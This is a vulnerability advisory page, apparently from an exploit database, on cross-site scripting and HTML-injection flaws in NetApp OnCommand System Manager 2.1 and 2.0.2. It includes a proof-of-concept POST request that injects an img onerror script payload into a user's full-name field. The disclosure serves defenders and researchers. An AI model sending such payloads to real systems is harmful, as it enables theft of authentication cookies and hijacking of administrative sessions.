header-logo
Suggest Exploit
vendor:
OnCommand System Manager
by:
SecurityFocus
7,5
CVSS
HIGH
Cross-Site Scripting and HTML-Injection
79 (Improper Neutralization of Input During Web Page Generation)
CWE
Product Name: OnCommand System Manager
Affected Version From: 2.1
Affected Version To: 2.0.2
Patch Exists: YES
Related CWE: N/A
CPE: a:netapp:oncommand_system_manager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

NetApp OnCommand System Manager Cross-Site Scripting and HTML-Injection Vulnerabilities

NetApp OnCommand System Manager is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate web pages. Additionally, web applications should be designed to prevent the introduction of malicious HTML and script code.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/59688/info
 
NetApp OnCommand System Manager is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
 
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
 
NetApp OnCommand System Manager 2.1, 2.0.2 and prior versions are vulnerable.

Request (full-name):
    POST /zapiServlet HTTP/1.1
    Host: 127.0.0.1:1457
    [...]
    <netapp version="1.7" 
xmlns="http://www.example.com/filer/admin";><useradmin-user-modify><useradmin-user><useradmin-user-info><full-name>test<img
 src=x onerror=alert(1) 
    </full-name><comment>test</comment><name>test</name><password-maximum-age>4294967295</password-maximum-age><password-minimum-age>0</password-minimum-age><useradmin-groups><useradmin-group-info><name>Administrators</name></useradmin-group-info></useradmin-groups></useradmin-user-info></useradmin-user></useradmin-user-modify></netapp>